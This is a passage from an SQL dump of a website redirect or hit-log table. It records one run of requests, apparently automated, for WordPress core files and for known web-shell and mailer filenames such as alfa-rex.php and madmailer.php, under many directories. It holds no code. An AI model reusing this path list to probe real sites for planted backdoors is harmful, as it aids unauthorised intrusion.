00:00:00',301),(52446,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-links-list-table.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:20','0000-00-00 00:00:00',301),(52447,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-list-table-compat.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:20','0000-00-00 00:00:00',301),(52448,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-list-table.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:10:21','0000-00-00 00:00:00',301),(52449,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-media-list-table.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:23','0000-00-00 00:00:00',301),(52450,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-ms-sites-list-table.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:23','0000-00-00 00:00:00',301),(52451,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-ms-themes-list-table.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:10:24','0000-00-00 00:00:00',301),(52452,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-ms-users-list-table.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:10:25','0000-00-00 00:00:00',301),(52453,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-plugin-install-list-table.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:10:26','0000-00-00 00:00:00',301),(52454,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-plugins-list-table.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:10:27','0000-00-00 00:00:00',301),(52455,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-post-comments-list-table.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:28','0000-00-00 00:00:00',301),(52456,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-posts-list-table.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:10:29','0000-00-00 00:00:00',301),(52457,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:30','0000-00-00 00:00:00',301),(52458,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:10:31','0000-00-00 00:00:00',301),(52459,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-privacy-policy-content.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:10:32','0000-00-00 00:00:00',301),(52460,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-privacy-requests-table.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:10:33','0000-00-00 00:00:00',301),(52461,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-screen.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:10:33','0000-00-00 00:00:00',301),(52462,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-site-health-auto-updates.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:34','0000-00-00 00:00:00',301),(52463,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-site-health.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:35','0000-00-00 00:00:00',301),(52464,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-site-icon.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:10:36','0000-00-00 00:00:00',301),(52465,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-terms-list-table.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:37','0000-00-00 00:00:00',301),(52466,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-theme-install-list-table.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:38','0000-00-00 00:00:00',301),(52467,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-themes-list-table.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:10:39','0000-00-00 00:00:00',301),(52468,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-upgrader-skin.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:39','0000-00-00 00:00:00',301),(52469,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-upgrader-skins.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:40','0000-00-00 00:00:00',301),(52470,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-upgrader.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:41','0000-00-00 00:00:00',301),(52471,'http://3s-technologies.com.tr/en/wp-admin/includes/class-wp-users-list-table.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:10:42','0000-00-00 00:00:00',301),(52472,'http://3s-technologies.com.tr/en/wp-admin/includes/comment.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:43','0000-00-00 00:00:00',301),(52473,'http://3s-technologies.com.tr/en/wp-admin/includes/continents-cities.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:10:44','0000-00-00 00:00:00',301),(52474,'http://3s-technologies.com.tr/en/wp-admin/includes/credits.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:10:45','0000-00-00 00:00:00',301),(52475,'http://3s-technologies.com.tr/en/wp-admin/includes/dashboard.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:10:46','0000-00-00 00:00:00',301),(52476,'http://3s-technologies.com.tr/en/wp-admin/includes/deprecated.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:10:47','0000-00-00 00:00:00',301),(52477,'http://3s-technologies.com.tr/en/wp-admin/includes/edit-tag-messages.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:10:47','0000-00-00 00:00:00',301),(52478,'http://3s-technologies.com.tr/en/wp-admin/includes/image-edit.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:10:48','0000-00-00 00:00:00',301),(52479,'http://3s-technologies.com.tr/en/wp-admin/includes/import.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:49','0000-00-00 00:00:00',301),(52480,'http://3s-technologies.com.tr/en/wp-admin/includes/list-table.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:10:50','0000-00-00 00:00:00',301),(52481,'http://3s-technologies.com.tr/en/wp-admin/includes/media.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:10:51','0000-00-00 00:00:00',301),(52482,'http://3s-technologies.com.tr/en/wp-admin/includes/menu.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:10:52','0000-00-00 00:00:00',301),(52483,'http://3s-technologies.com.tr/en/wp-admin/includes/meta-boxes.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:10:53','0000-00-00 00:00:00',301),(52484,'http://3s-technologies.com.tr/en/wp-admin/includes/misc.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:54','0000-00-00 00:00:00',301),(52485,'http://3s-technologies.com.tr/en/wp-admin/includes/ms-admin-filters.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:10:55','0000-00-00 00:00:00',301),(52486,'http://3s-technologies.com.tr/en/wp-admin/includes/ms-deprecated.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:56','0000-00-00 00:00:00',301),(52487,'http://3s-technologies.com.tr/en/wp-admin/includes/ms.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:10:57','0000-00-00 00:00:00',301),(52488,'http://3s-technologies.com.tr/en/wp-admin/includes/nav-menu.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:10:58','0000-00-00 00:00:00',301),(52489,'http://3s-technologies.com.tr/en/wp-admin/includes/network.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:10:58','0000-00-00 00:00:00',301),(52490,'http://3s-technologies.com.tr/en/wp-admin/includes/noop.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:10:59','0000-00-00 00:00:00',301),(52491,'http://3s-technologies.com.tr/en/wp-admin/includes/options.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:11:00','0000-00-00 00:00:00',301),(52492,'http://3s-technologies.com.tr/en/wp-admin/includes/plugin-install.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:11:01','0000-00-00 00:00:00',301),(52493,'http://3s-technologies.com.tr/en/wp-admin/includes/plugin.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:02','0000-00-00 00:00:00',301),(52494,'http://3s-technologies.com.tr/en/wp-admin/includes/post.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:11:03','0000-00-00 00:00:00',301),(52495,'http://3s-technologies.com.tr/en/wp-admin/includes/privacy-tools.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:04','0000-00-00 00:00:00',301),(52496,'http://3s-technologies.com.tr/en/wp-admin/includes/revision.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:05','0000-00-00 00:00:00',301),(52497,'http://3s-technologies.com.tr/en/wp-admin/includes/schema.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:11:06','0000-00-00 00:00:00',301),(52498,'http://3s-technologies.com.tr/en/wp-admin/includes/screen.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:07','0000-00-00 00:00:00',301),(52499,'http://3s-technologies.com.tr/en/wp-admin/includes/taxonomy.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:08','0000-00-00 00:00:00',301),(52500,'http://3s-technologies.com.tr/en/wp-admin/includes/template.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:11:09','0000-00-00 00:00:00',301),(52501,'http://3s-technologies.com.tr/en/wp-admin/includes/theme-install.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:10','0000-00-00 00:00:00',301),(52502,'http://3s-technologies.com.tr/en/wp-admin/includes/theme.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:11','0000-00-00 00:00:00',301),(52503,'http://3s-technologies.com.tr/en/wp-admin/includes/translation-install.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:12','0000-00-00 00:00:00',301),(52504,'http://3s-technologies.com.tr/en/wp-admin/includes/update-core.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:13','0000-00-00 00:00:00',301),(52505,'http://3s-technologies.com.tr/en/wp-admin/includes/update.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:14','0000-00-00 00:00:00',301),(52506,'http://3s-technologies.com.tr/en/wp-admin/includes/upgrade.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:14','0000-00-00 00:00:00',301),(52507,'http://3s-technologies.com.tr/en/wp-admin/includes/user.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:15','0000-00-00 00:00:00',301),(52508,'http://3s-technologies.com.tr/en/wp-admin/includes/widgets.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:11:16','0000-00-00 00:00:00',301),(52509,'http://3s-technologies.com.tr/en/wp-admin/includes/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:11:17','0000-00-00 00:00:00',301),(52510,'http://3s-technologies.com.tr/en/wp-admin/networks.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:11:18','0000-00-00 00:00:00',301),(52511,'http://3s-technologies.com.tr/en/wp-admin/plugins.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:19','0000-00-00 00:00:00',301),(52512,'http://3s-technologies.com.tr/en/wp-admin/test.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:20','0000-00-00 00:00:00',301),(52513,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/endurance-page-cache.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:11:21','0000-00-00 00:00:00',301),(52514,'http://3s-technologies.com.tr/en/wp-content/mu-plugins/sso.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:22','0000-00-00 00:00:00',301),(52515,'http://3s-technologies.com.tr/en/wp-content/uploads/az.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:11:27','0000-00-00 00:00:00',301),(52516,'http://3s-technologies.com.tr/en/wp-content/uploads/lufi.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:28','0000-00-00 00:00:00',301),(52517,'http://3s-technologies.com.tr/en/wp-content/uploads/madmailer.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:29','0000-00-00 00:00:00',301),(52518,'http://3s-technologies.com.tr/en/wp-content/uploads/s.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:30','0000-00-00 00:00:00',301),(52519,'http://3s-technologies.com.tr/en/wp-content/uploads/ssmailer.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:31','0000-00-00 00:00:00',301),(52520,'http://3s-technologies.com.tr/en/wp-content/uploads/sts.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:11:32','0000-00-00 00:00:00',301),(52521,'http://3s-technologies.com.tr/en/wp-content/uploads/stsmailer.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:11:33','0000-00-00 00:00:00',301),(52522,'http://3s-technologies.com.tr/en/wp-content/uploads/testmail.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:33','0000-00-00 00:00:00',301),(52523,'http://3s-technologies.com.tr/en/wp-includes/id3/alfa-rex.php',NULL,'https://www.bing.com/','',5,0,'2025-12-20 05:11:34','0000-00-00 00:00:00',301),(52524,'http://3s-technologies.com.tr/en/wp-includes/id3/getid3.lib.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:35','0000-00-00 00:00:00',301),(52525,'http://3s-technologies.com.tr/en/wp-includes/id3/getid3.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:11:36','0000-00-00 00:00:00',301),(52526,'http://3s-technologies.com.tr/en/wp-includes/id3/module.audio-video.asf.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:11:37','0000-00-00 00:00:00',301),(52527,'http://3s-technologies.com.tr/en/wp-includes/id3/module.audio-video.flv.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:11:38','0000-00-00 00:00:00',301),(52528,'http://3s-technologies.com.tr/en/wp-includes/id3/module.audio-video.matroska.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:39','0000-00-00 00:00:00',301),(52529,'http://3s-technologies.com.tr/en/wp-includes/id3/module.audio-video.quicktime.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:40','0000-00-00 00:00:00',301),(52530,'http://3s-technologies.com.tr/en/wp-includes/id3/module.audio-video.riff.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:41','0000-00-00 00:00:00',301),(52531,'http://3s-technologies.com.tr/en/wp-includes/id3/module.audio.ac3.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:11:42','0000-00-00 00:00:00',301),(52532,'http://3s-technologies.com.tr/en/wp-includes/id3/module.audio.dts.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:43','0000-00-00 00:00:00',301),(52533,'http://3s-technologies.com.tr/en/wp-includes/id3/module.audio.flac.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:43','0000-00-00 00:00:00',301),(52534,'http://3s-technologies.com.tr/en/wp-includes/id3/module.audio.mp3.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:11:44','0000-00-00 00:00:00',301),(52535,'http://3s-technologies.com.tr/en/wp-includes/id3/module.audio.ogg.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:11:45','0000-00-00 00:00:00',301),(52536,'http://3s-technologies.com.tr/en/wp-includes/id3/module.tag.apetag.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:11:46','0000-00-00 00:00:00',301),(52537,'http://3s-technologies.com.tr/en/wp-includes/id3/module.tag.id3v1.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:47','0000-00-00 00:00:00',301),(52538,'http://3s-technologies.com.tr/en/wp-includes/id3/module.tag.id3v2.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:48','0000-00-00 00:00:00',301),(52539,'http://3s-technologies.com.tr/en/wp-includes/id3/module.tag.lyrics3.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:49','0000-00-00 00:00:00',301),(52540,'http://3s-technologies.com.tr/en/wp-includes/ixr/alfa-rex.php',NULL,'https://www.google.de/','',5,0,'2025-12-20 05:11:50','0000-00-00 00:00:00',301),(52541,'http://3s-technologies.com.tr/en/wp-includes/ixr/class-ixr-base64.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:11:51','0000-00-00 00:00:00',301),(52542,'http://3s-technologies.com.tr/en/wp-includes/ixr/class-ixr-client.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:52','0000-00-00 00:00:00',301),(52543,'http://3s-technologies.com.tr/en/wp-includes/ixr/class-ixr-clientmulticall.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:53','0000-00-00 00:00:00',301),(52544,'http://3s-technologies.com.tr/en/wp-includes/ixr/class-ixr-date.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:53','0000-00-00 00:00:00',301),(52545,'http://3s-technologies.com.tr/en/wp-includes/ixr/class-ixr-error.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:11:54','0000-00-00 00:00:00',301),(52546,'http://3s-technologies.com.tr/en/wp-includes/ixr/class-ixr-introspectionserver.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:11:55','0000-00-00 00:00:00',301),(52547,'http://3s-technologies.com.tr/en/wp-includes/ixr/class-ixr-message.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:11:56','0000-00-00 00:00:00',301),(52548,'http://3s-technologies.com.tr/en/wp-includes/ixr/class-ixr-request.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:11:57','0000-00-00 00:00:00',301),(52549,'http://3s-technologies.com.tr/en/wp-includes/ixr/class-ixr-server.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:11:58','0000-00-00 00:00:00',301),(52550,'http://3s-technologies.com.tr/en/wp-includes/ixr/class-ixr-value.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:11:59','0000-00-00 00:00:00',301),(52551,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/exception.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:12:00','0000-00-00 00:00:00',301),(52552,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/phpmailer.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:12:01','0000-00-00 00:00:00',301),(52553,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/smtp.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:12:01','0000-00-00 00:00:00',301),(52554,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/about.php',NULL,'https://www.google.fr/','',5,0,'2025-12-20 05:12:02','0000-00-00 00:00:00',301),(52555,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/alfa-rex.php',NULL,'https://www.google.co.uk/','',5,0,'2025-12-20 05:12:03','0000-00-00 00:00:00',301),(52556,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:12:04','0000-00-00 00:00:00',301),(52557,'http://3s-technologies.com.tr/en/wp-includes/requests/alfa-rex.php',NULL,'https://www.yahoo.com/','',17,0,'2025-12-20 05:12:05','0000-00-00 00:00:00',301),(52558,'http://3s-technologies.com.tr/en/wp-includes/requests/library/requests.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:08','0000-00-00 00:00:00',301),(52559,'http://3s-technologies.com.tr/en/wp-includes/requests/library/about.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:12:09','0000-00-00 00:00:00',301),(52560,'http://3s-technologies.com.tr/en/wp-includes/requests/library/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:12:10','0000-00-00 00:00:00',301),(52561,'http://3s-technologies.com.tr/en/wp-includes/requests/library/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:12:11','0000-00-00 00:00:00',301),(52562,'http://3s-technologies.com.tr/en/wp-includes/requests/src/auth.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:12:12','0000-00-00 00:00:00',301),(52563,'http://3s-technologies.com.tr/en/wp-includes/requests/src/auth/basic.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:12:13','0000-00-00 00:00:00',301),(52564,'http://3s-technologies.com.tr/en/wp-includes/requests/src/auth/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:12:14','0000-00-00 00:00:00',301),(52565,'http://3s-technologies.com.tr/en/wp-includes/requests/src/auth/alfa-rex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:12:15','0000-00-00 00:00:00',301),(52566,'http://3s-technologies.com.tr/en/wp-includes/requests/src/auth/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:12:15','0000-00-00 00:00:00',301),(52567,'http://3s-technologies.com.tr/en/wp-includes/requests/src/autoload.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:16','0000-00-00 00:00:00',301),(52568,'http://3s-technologies.com.tr/en/wp-includes/requests/src/capability.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:12:17','0000-00-00 00:00:00',301),(52569,'http://3s-technologies.com.tr/en/wp-includes/requests/src/cookie.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:12:18','0000-00-00 00:00:00',301),(52570,'http://3s-technologies.com.tr/en/wp-includes/requests/src/cookie/about.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:12:19','0000-00-00 00:00:00',301),(52571,'http://3s-technologies.com.tr/en/wp-includes/requests/src/cookie/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:12:20','0000-00-00 00:00:00',301),(52572,'http://3s-technologies.com.tr/en/wp-includes/requests/src/cookie/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:12:21','0000-00-00 00:00:00',301),(52573,'http://3s-technologies.com.tr/en/wp-includes/requests/src/exception.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:12:22','0000-00-00 00:00:00',301),(52574,'http://3s-technologies.com.tr/en/wp-includes/requests/src/exception/argumentcount.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:12:23','0000-00-00 00:00:00',301),(52575,'http://3s-technologies.com.tr/en/wp-includes/requests/src/exception/http.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:24','0000-00-00 00:00:00',301),(52576,'http://3s-technologies.com.tr/en/wp-includes/requests/src/exception/invalidargument.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:12:25','0000-00-00 00:00:00',301),(52577,'http://3s-technologies.com.tr/en/wp-includes/requests/src/exception/transport.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:12:26','0000-00-00 00:00:00',301),(52578,'http://3s-technologies.com.tr/en/wp-includes/requests/src/exception/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:27','0000-00-00 00:00:00',301),(52579,'http://3s-technologies.com.tr/en/wp-includes/requests/src/exception/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:12:28','0000-00-00 00:00:00',301),(52580,'http://3s-technologies.com.tr/en/wp-includes/requests/src/exception/wp-login.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:12:29','0000-00-00 00:00:00',301),(52581,'http://3s-technologies.com.tr/en/wp-includes/requests/src/hookmanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:12:29','0000-00-00 00:00:00',301),(52582,'http://3s-technologies.com.tr/en/wp-includes/requests/src/hooks.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:12:30','0000-00-00 00:00:00',301),(52583,'http://3s-technologies.com.tr/en/wp-includes/requests/src/idnaencoder.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:12:31','0000-00-00 00:00:00',301),(52584,'http://3s-technologies.com.tr/en/wp-includes/requests/src/ipv6.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:12:32','0000-00-00 00:00:00',301),(52585,'http://3s-technologies.com.tr/en/wp-includes/requests/src/iri.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:12:33','0000-00-00 00:00:00',301),(52586,'http://3s-technologies.com.tr/en/wp-includes/requests/src/port.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:12:34','0000-00-00 00:00:00',301),(52587,'http://3s-technologies.com.tr/en/wp-includes/requests/src/proxy.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:12:35','0000-00-00 00:00:00',301),(52588,'http://3s-technologies.com.tr/en/wp-includes/requests/src/proxy/http.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:36','0000-00-00 00:00:00',301),(52589,'http://3s-technologies.com.tr/en/wp-includes/requests/src/proxy/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:12:36','0000-00-00 00:00:00',301),(52590,'http://3s-technologies.com.tr/en/wp-includes/requests/src/proxy/alfa-rex.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:12:37','0000-00-00 00:00:00',301),(52591,'http://3s-technologies.com.tr/en/wp-includes/requests/src/proxy/wp-login.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:12:38','0000-00-00 00:00:00',301),(52592,'http://3s-technologies.com.tr/en/wp-includes/requests/src/requests.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:12:39','0000-00-00 00:00:00',301),(52593,'http://3s-technologies.com.tr/en/wp-includes/requests/src/response.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:40','0000-00-00 00:00:00',301),(52594,'http://3s-technologies.com.tr/en/wp-includes/requests/src/response/headers.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:41','0000-00-00 00:00:00',301),(52595,'http://3s-technologies.com.tr/en/wp-includes/requests/src/response/about.php',NULL,'https://www.google.com/','',14,0,'2025-12-20 05:12:42','0000-00-00 00:00:00',301),(52596,'http://3s-technologies.com.tr/en/wp-includes/requests/src/response/alfa-rex.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:12:43','0000-00-00 00:00:00',301),(52597,'http://3s-technologies.com.tr/en/wp-includes/requests/src/response/wp-login.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:12:43','0000-00-00 00:00:00',301),(52598,'http://3s-technologies.com.tr/en/wp-includes/requests/src/session.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:12:44','0000-00-00 00:00:00',301),(52599,'http://3s-technologies.com.tr/en/wp-includes/requests/src/ssl.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:45','0000-00-00 00:00:00',301),(52600,'http://3s-technologies.com.tr/en/wp-includes/requests/src/transport.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:12:46','0000-00-00 00:00:00',301),(52601,'http://3s-technologies.com.tr/en/wp-includes/requests/src/transport/curl.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:12:47','0000-00-00 00:00:00',301),(52602,'http://3s-technologies.com.tr/en/wp-includes/requests/src/transport/fsockopen.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:12:48','0000-00-00 00:00:00',301),(52603,'http://3s-technologies.com.tr/en/wp-includes/requests/src/transport/about.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:12:49','0000-00-00 00:00:00',301),(52604,'http://3s-technologies.com.tr/en/wp-includes/requests/src/transport/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:12:50','0000-00-00 00:00:00',301),(52605,'http://3s-technologies.com.tr/en/wp-includes/requests/src/transport/wp-login.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:12:50','0000-00-00 00:00:00',301),(52606,'http://3s-technologies.com.tr/en/wp-includes/requests/src/utility/caseinsensitivedictionary.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:12:51','0000-00-00 00:00:00',301),(52607,'http://3s-technologies.com.tr/en/wp-includes/requests/src/utility/filterediterator.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:12:52','0000-00-00 00:00:00',301),(52608,'http://3s-technologies.com.tr/en/wp-includes/requests/src/utility/inputvalidator.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:53','0000-00-00 00:00:00',301),(52609,'http://3s-technologies.com.tr/en/wp-includes/requests/src/utility/about.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:12:54','0000-00-00 00:00:00',301),(52610,'http://3s-technologies.com.tr/en/wp-includes/requests/src/utility/alfa-rex.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:55','0000-00-00 00:00:00',301),(52611,'http://3s-technologies.com.tr/en/wp-includes/requests/src/utility/wp-login.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:12:56','0000-00-00 00:00:00',301),(52612,'http://3s-technologies.com.tr/en/wp-includes/requests/src/about.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:12:56','0000-00-00 00:00:00',301),(52613,'http://3s-technologies.com.tr/en/wp-includes/requests/src/alfa-rex.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 